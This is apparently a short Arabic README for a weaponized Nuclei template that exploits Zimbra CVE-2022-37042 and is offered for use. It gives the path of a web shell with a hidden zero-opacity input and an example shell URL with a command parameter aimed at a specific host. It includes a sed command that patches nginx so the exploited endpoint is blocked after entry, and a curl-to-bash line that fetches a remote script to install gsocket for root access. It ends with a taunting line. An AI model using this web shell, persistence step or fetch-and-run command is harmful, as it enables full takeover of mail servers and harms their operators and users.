
Zimbra CVE-2022-37042 قالب Nuclei مسلح
مسار الشيل: /public/formatter.jsp
Nuclei نفسه: https://github.com/projectdiscovery/nuclei
الشيل يحتوي على إدخال مخفي مع شفافية 0، لذا فقط حرك الماوس فوقه، اكتب الأمر، ثم اضغط على مفتاح [Enter]:
مثال على رابط الشيل:
https://ms1.fission.com:8443/public/formatter.jsp?cmd=id
قم بتنفيذ هذا الأمر (مرة واحدة فقط):
cd /opt/zimbra/conf/nginx/templates/; sed -i 's|location ~\* \^/zmerror_|location = /service/extension/backup/mboximport { return 403; }\n location ~\* \^/zmerror_|' nginx.conf.web.http*; /opt/zimbra/bin/zmproxyctl restart;
هناك حاجة إلى كود إضافي للخوادم التي تستخدم Apache بدلاً من Nginx. طلبات السحب (Pull requests) مرحب بها.
curl -fskSL raw.githubusercontent.com/aels/zimbra-slapper/main/slapper.sh | bash 2>&1
هذا الأمر سيقوم بتثبيت global-socket (https://www.gsocket.io/deploy/) وسيمنحك المفتاح للاتصال كجذر (root).
عيد ميلاد سعيد مذبحة، أيها الأوغاد ;)